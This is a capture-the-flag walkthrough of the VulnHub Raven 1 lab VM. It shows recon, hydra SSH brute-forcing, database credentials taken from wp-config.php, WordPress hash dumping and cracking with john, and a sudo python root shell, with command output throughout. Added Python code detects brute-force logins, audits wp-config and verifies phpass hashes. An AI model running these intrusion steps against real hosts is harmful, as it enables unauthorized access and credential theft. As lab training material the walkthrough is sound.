Background overview:
Download address: https://www.vulnhub.com/entry/raven-1,256/
The IP of the target is 100.10.10.132; add this IP address to the hosts file and map it to the domain name raven.local.
1. Information collection
1.1 Scan for the target host IP
Use the command arp-scan -l to scan for live hosts on the LAN.
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
100.10.10.1     00:50:56:c0:00:08       VMware, Inc.
100.10.10.132   00:0c:29:5a:b1:05       VMware, Inc.
100.10.10.253   00:50:56:f5:d5:54       VMware, Inc.
100.10.10.254   00:50:56:e1:62:61       VMware, Inc.
From the MAC address we can tell that the IP address of our target is 100.10.10.132.
1.2 Scan the target host's open ports
Use nmap to scan the target host's open ports with the command nmap -sS -Pn -p 1-65535 100.10.10.132.
└─# nmap -sS -Pn -p 1-65535 100.10.10.132
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-28 09:41 CST
Nmap scan report for 100.10.10.132
Host is up (0.00083s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
40396/tcp open  unknown
MAC Address: 00:0C:29:5A:B1:05 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 22.46 seconds
According to the results, the target host has ports 22, 80, 111 and 40396 open.
2. Web site detection
2.1 Get the first flag
Information collection showed that the target host has port 80 open, so we went to the web site and looked at the page source. The source of http://raven.local/service.html contains a comment with the first flag: <!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->
2.2 WordPress scanning
The URL http://raven.local/wordpress/ exists on the site, so it can be inferred that the site is built with the WordPress CMS. Therefore WPScan can be used to scan it.
First, update the vulnerability database.
wpscan --update
Then scan the URL.
wpscan --url http://raven.local/wordpress/
The scan gives the following results:
server: Apache/2.4.10 (Debian)
WordPress version 4.8.17
Nothing exploitable was found here.
2.3 SSH service
The site has the URL http://raven.local/wordpress/index.php/author/michael/, which reveals the user name michael.
We can try brute-forcing the SSH service with this user name.
Use hydra with a password dictionary for the brute-force. Start with the classic fasttrack.txt wordlist.
hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local
No password was found.
Let's switch to a dictionary generated by cupp and try again. [cupp installation tutorial]
└─# cupp -i
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]

[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: michael        # enter the user name
> Surname: michael           # enter the user name
> Nickname: michael          # enter the user name
> Birthdate (DDMMYYYY):

> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):

> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):

> Pet's name:
> Company name:

> Do you want to add some key words about the victim? Y/[N]:
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 60 words.
[+] Now load your pistolero with michael.txt and shoot! Good luck!
cupp has generated the file michael.txt; use it to brute-force again with the command hydra -l michael -P ./michael.txt ssh://raven.local.
└─# hydra -l michael -P ./michael.txt ssh://raven.local
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-28 14:49:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 60 login tries (l:1/p:60), ~4 tries per task
[DATA] attacking ssh://raven.local:22/
[22][ssh] host: raven.local   login: michael   password: michael
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 5 final worker threads did not complete until end.
[ERROR] 5 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-28 14:49:37
The account is michael and the password is michael.
Log in with this account and password using the command ssh michael@raven.local. You will be asked whether to continue connecting; enter yes.
└─# ssh michael@raven.local
The authenticity of host 'raven.local (100.10.10.132)' can't be established.
ECDSA key fingerprint is SHA256:rCGKSPq0sUfa5mqn/8/M0T63OxqkEIR39pi835oSDo8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'raven.local' (ECDSA) to the list of known hosts.
michael@raven.local's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Dec 27 18:25:22 2021 from 100.10.10.129
michael@Raven:~$
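From the defender's side, the hydra run above leaves a very recognisable trace in the SSH server's auth log: a burst of "Failed password" lines from one source IP within a few seconds (hydra used 16 parallel tasks), followed by an "Accepted password" from the same IP once the guess succeeds. The following Python is an added example, not code from the original walkthrough, that parses constructed sshd log lines in the standard syslog format and flags such bursts. The sample lines, the threshold and window values, and the year assumed for the timestamps are all constructed for the example; only the user name and attacking IP mirror the walkthrough.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in syslog format (not copied from the target; the user
# name and the attacking IP mirror the walkthrough, everything else is made up).
SAMPLE_AUTH_LOG = """\
Dec 28 14:49:30 Raven sshd[2101]: Failed password for michael from 100.10.10.129 port 51230 ssh2
Dec 28 14:49:30 Raven sshd[2102]: Failed password for michael from 100.10.10.129 port 51231 ssh2
Dec 28 14:49:31 Raven sshd[2103]: Failed password for michael from 100.10.10.129 port 51232 ssh2
Dec 28 14:49:31 Raven sshd[2104]: Failed password for invalid user admin from 100.10.10.129 port 51233 ssh2
Dec 28 14:49:32 Raven sshd[2105]: Failed password for michael from 100.10.10.129 port 51234 ssh2
Dec 28 14:49:33 Raven sshd[2106]: Failed password for michael from 100.10.10.129 port 51235 ssh2
Dec 28 14:49:37 Raven sshd[2110]: Accepted password for michael from 100.10.10.129 port 51240 ssh2
Dec 28 15:10:02 Raven sshd[2200]: Accepted publickey for steven from 100.10.10.1 port 40022 ssh2
Dec 28 15:12:45 Raven sshd[2201]: Failed password for steven from 100.10.10.1 port 40023 ssh2
"""

LOG_YEAR = 2021  # syslog timestamps carry no year; assumed here for the sample

# One sshd auth event: "Failed|Accepted <method> for [invalid user ]<user> from <ip> port <n>"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line: str):
    """Return a dict for an sshd auth line, or None for any other line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> list:
    """Flag source IPs with >= threshold failed logins inside window_s seconds,
    and record whether the same IP logged in successfully after the burst."""
    failed, accepted = defaultdict(list), defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            (failed if ev["result"] == "Failed" else accepted)[ev["ip"]].append(ev)

    alerts = []
    window = timedelta(seconds=window_s)
    for ip, fails in failed.items():
        fails.sort(key=lambda e: e["ts"])
        # slide over the sorted failures; the first run of `threshold` events
        # that fits in the window triggers an alert for this IP
        for i in range(len(fails) - threshold + 1):
            start = fails[i]["ts"]
            if fails[i + threshold - 1]["ts"] - start > window:
                continue
            burst = [f for f in fails if start <= f["ts"] <= start + window]
            end = burst[-1]["ts"]
            alerts.append({
                "ip": ip,
                "first": start,
                "last": end,
                "failures": len(burst),
                "users": sorted({f["user"] for f in burst}),
                # a success right after a burst is the high-severity case
                "success_after": any(a["ts"] >= end for a in accepted.get(ip, [])),
            })
            break  # one alert per IP is enough for this demonstration
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{a['ip']}: {a['failures']} failures {a['first']:%H:%M:%S}-{a['last']:%H:%M:%S} "
              f"users={a['users']} success_after={a['success_after']}")
```

The single failed login from 100.10.10.1 stays below the threshold, while the six failures from 100.10.10.129 within four seconds are flagged together with the success that follows them. In production the same logic belongs in fail2ban or a SIEM rule, and the hydra warning about parallel tasks is itself a hint at the mitigation: sshd's MaxStartups and MaxAuthTries plus a rate limit slow exactly this pattern.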
3. Privilege escalation
3.1 Kernel version
Use the command uname -a to view the kernel version.
michael@Raven:~$ uname -a
Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux
No exploitable vulnerabilities were found.
3.2 SUID privilege escalation
Look for SUID binaries.
michael@Raven:~$ find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/umount
/bin/su
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/sensible-mda
/sbin/mount.nfs
Nothing usable here.
3.3 MySQL login
Traverse the site directory /var/www and find the file flag2.txt.
michael@Raven:~$ cd /var/www
michael@Raven:/var/www$ ls
flag2.txt  html
michael@Raven:/var/www$ cat flag2.txt
flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
Check the web site configuration file /var/www/html/wordpress/wp-config.php.
michael@Raven:/var/www/html/wordpress$ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'R@v3nSecurity');

/** MySQL hostname */
define('DB_HOST', 'localhost')
The MySQL account root with the password R@v3nSecurity is found.
Use the command mysql -h localhost -u root -pR@v3nSecurity to connect to the MySQL database.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 68
Server version: 5.5.60-0+deb8u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
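Two configuration weaknesses made this step possible: wp-config.php was readable by the unprivileged user michael, and the site connects to MySQL as root rather than as a dedicated least-privilege account. The following Python is an added audit check, not code from the walkthrough or from WordPress, that parses the define() entries of a wp-config.php and reports those two problems plus default secret keys. The sample config text (with a placeholder password), the finding codes and the file modes fed to the audit are constructed for the example.

```python
import os
import re
import stat

# Constructed wp-config.php excerpt modelled on the one read from the target;
# the password is an obvious placeholder, not the real one.
SAMPLE_WP_CONFIG = """\
<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'PLACEHOLDER_PASSWORD');
define('DB_HOST', 'localhost');
define( 'AUTH_KEY',         'put your unique phrase here' );
define( 'SECURE_AUTH_KEY',  'kX9example-not-a-real-key' );
define('WP_DEBUG', false);
$table_prefix = 'wp_';
"""

# Matches define('NAME', 'value') or define('NAME', bareword), either quote style.
DEFINE_RE = re.compile(
    r"""define\(\s*['"](\w+)['"]\s*,\s*(?:['"]([^'"]*)['"]|([A-Za-z0-9_.]+))\s*\)"""
)

# The eight secret keys/salts WordPress expects an operator to randomise.
WP_SECRET_KEYS = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
                  "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")
DEFAULT_SECRET = "put your unique phrase here"  # the placeholder shipped in wp-config-sample.php


def parse_wp_config(text: str) -> dict:
    """Return the constants set via define() as a name -> string mapping."""
    defs = {}
    for m in DEFINE_RE.finditer(text):
        name, quoted, bare = m.groups()
        defs[name] = quoted if quoted is not None else bare
    return defs


def audit_wp_config(defs: dict, mode: int) -> list:
    """Return finding codes for the parsed values and the file's permission bits."""
    findings = []
    if defs.get("DB_USER") == "root":
        findings.append("db-user-is-root")       # the app should use a least-privilege DB account
    if mode & stat.S_IROTH:
        findings.append("world-readable")        # any local user can read the DB password
    if any(defs.get(k) == DEFAULT_SECRET for k in WP_SECRET_KEYS):
        findings.append("default-secret-keys")   # cookies and nonces become forgeable
    if defs.get("WP_DEBUG") == "true":
        findings.append("debug-enabled")         # verbose errors leak paths and queries
    return findings


def audit_file(path: str) -> list:
    """Audit a real wp-config.php on disk, taking the mode from os.stat."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        defs = parse_wp_config(fh.read())
    return audit_wp_config(defs, stat.S_IMODE(os.stat(path).st_mode))


if __name__ == "__main__":
    parsed = parse_wp_config(SAMPLE_WP_CONFIG)
    print("mode 0644:", audit_wp_config(parsed, 0o644))
    print("mode 0640:", audit_wp_config(parsed, 0o640))
```

Run against a live site with audit_file("/var/www/html/wordpress/wp-config.php") from an account that is allowed to read it; the usual remediation is a dedicated MySQL user with rights only on the wordpress database, mode 0640 owned by root with the web server's group, and freshly generated secret keys.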
3.4 Database operations
Use the command show databases; to list the databases.
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.00 sec)
Use the command use wordpress to switch to the wordpress database.
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Use the command show tables to list the tables in the current database.
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)
Use the command select * from wp_users; to view the contents of the wp_users table.
mysql> select * from wp_users;
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
| ID | user_login | user_pass                          | user_nicename | user_email        | user_url | user_registered     | user_activation_key | user_status | display_name   |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
|  1 | michael    | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 | michael       | michael@raven.org |          | 2018-08-12 22:49:12 |                     |           0 | michael        |
|  2 | steven     | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ | steven        | steven@raven.org  |          | 2018-08-12 23:31:16 |                     |           0 | Steven Seagull |
+----+------------+------------------------------------+---------------+-------------------+----------+---------------------+---------------------+-------------+----------------+
2 rows in set (0.00 sec)
The user steven exists, with the password hash $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/. The password is stored hashed, not in clear text.
First export the account names and hashes to a text file.
mysql> SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';
Query OK, 2 rows affected (0.00 sec)
View the file contents.
michael@Raven:/usr/share$ cat /tmp/wordpress.txt
michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0
steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
3.5 File transfer
Start an HTTP server on the target host to transfer the wordpress.txt file. Enter the /tmp directory on the target host and run the command python -m SimpleHTTPServer 8888.
michael@Raven:/tmp$ python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
On kali, download the wordpress.txt file from the target host with the command wget http://raven.local:8888/wordpress.txt.
└─# wget http://raven.local:8888/wordpress.txt
--2021-12-28 16:27:32--  http://raven.local:8888/wordpress.txt
Resolving host raven.local (raven.local)... 100.10.10.132
Connecting to raven.local (raven.local)|100.10.10.132|:8888... Connected.
Issued HTTP request, waiting for response... 200 OK
Length: 85 [text/plain]
Saving to: "wordpress.txt"

wordpress.txt   100%[=====================================================>]  85  --.-KB/s  Time 0 s

2021-12-28 16:27:32 (1.47 MB/s) - Saved "wordpress.txt" [85/85]
3.6 Cracking the password with john
Use the famous rockyou.txt dictionary (shipped with kali) to crack the password. The /usr/share/wordlists directory contains it compressed as rockyou.txt.gz; run the following command there to extract rockyou.txt.
dirb  dirbuster  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt.gz
└─# gzip -d rockyou.txt.gz
On the kali machine, in the directory containing the wordpress.txt file, run the following command to crack the password with john.
└─# john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pink84           (steven)
The password of the steven account is pink84.
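john identified the hashes as phpass with an iteration count of 8192. The $P$ prefix is WordPress's portable hash: character 4 encodes the cost as a power of two ('B' is index 13 in the phpass alphabet, so 2^13 = 8192 rounds), characters 5 to 12 are the salt, and the remaining 22 characters are the base-64 encoded result of MD5(salt + password) re-hashed 8192 times with the password appended each round. The following Python is an added example, not code from the walkthrough or from WordPress, that parses and recomputes such hashes so a recovered password can be checked against steven's stored hash; the helper names are assumptions and the round-trip test uses a hash the code generates itself.

```python
import hashlib
import hmac
import os

# phpass alphabet (crypt(3) order, '.' and '/' first).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash for steven as read from wp_users on the target (copied from the page).
STEVEN_HASH = "$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/"


def _encode64(raw: bytes, count: int) -> str:
    """phpass' base-64 variant: 3 bytes -> 4 chars, little-endian, no padding."""
    out, i = [], 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_phpass(stored: str) -> dict:
    """Split a 34-char portable hash into its fields; ValueError if malformed."""
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    cost_log2 = ITOA64.find(stored[3])
    if not 7 <= cost_log2 <= 30:          # phpass rejects costs outside this range
        raise ValueError("cost byte out of range")
    return {
        "prefix": stored[:3],
        "cost_log2": cost_log2,
        "iterations": 1 << cost_log2,      # what john reports as "iteration count"
        "salt": stored[4:12],
        "digest": stored[12:],
    }


def phpass_hash(password: str, setting: str) -> str:
    """Recompute the hash from a setting ($P$ + cost char + 8-char salt ...)."""
    cost_log2 = ITOA64.find(setting[3])
    salt = setting[4:12]
    if not 7 <= cost_log2 <= 30 or len(salt) != 8:
        raise ValueError("bad phpass setting")
    pw = password.encode("utf-8")
    digest = hashlib.md5(salt.encode("ascii") + pw).digest()
    for _ in range(1 << cost_log2):        # 8192 rounds for cost char 'B'
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed hash with the stored one."""
    parse_phpass(stored)  # reject malformed input before doing any work
    return hmac.compare_digest(phpass_hash(password, stored), stored)


def phpass_new(password: str, cost_log2: int = 13) -> str:
    """Create a fresh hash the way phpass does: 6 random bytes -> 8-char salt."""
    salt = _encode64(os.urandom(6), 6)
    return phpass_hash(password, "$P$" + ITOA64[cost_log2] + salt)


if __name__ == "__main__":
    info = parse_phpass(STEVEN_HASH)
    print(f"cost 2^{info['cost_log2']} = {info['iterations']} rounds, salt {info['salt']}")
    print("pink84 matches steven's hash:", phpass_verify("pink84", STEVEN_HASH))
```

Eight thousand MD5 rounds cost well under a millisecond on a modern core, which is why a rockyou.txt run finishes almost instantly against a weak password: the iteration count only multiplies the attacker's work by a constant, so the real defence is password strength and a memory-hard or bcrypt-class hash.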
Use this account to connect over SSH with the command ssh steven@raven.local.
└─# ssh steven@raven.local
steven@raven.local's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 27 18:43:33 2021 from 100.10.10.129
View the current user.
$ whoami
steven
3.7 sudo privileges
Try to escalate privileges through sudo and python.
The command sudo python3 -c 'import pty; pty.spawn("/bin/sh")' fails to escalate.
The command sudo python -c 'import os; os.system("/bin/sh")' escalates successfully.
$ sudo python -c 'import os; os.system("/bin/sh")'
# whoami
root
Enter the /root directory and view the last flag.
# cd /root
# ls
flag4.txt
# cat flag4.txt
 ______
 | ___ \
 | |_/ /__ ___   _____ _ __
 |    // _` \ \ / / _ \ '_ \
 | |\ \ (_| |\ V /  __/ | | |
 \_| \_\__,_| \_/ \___|_| |_|

flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io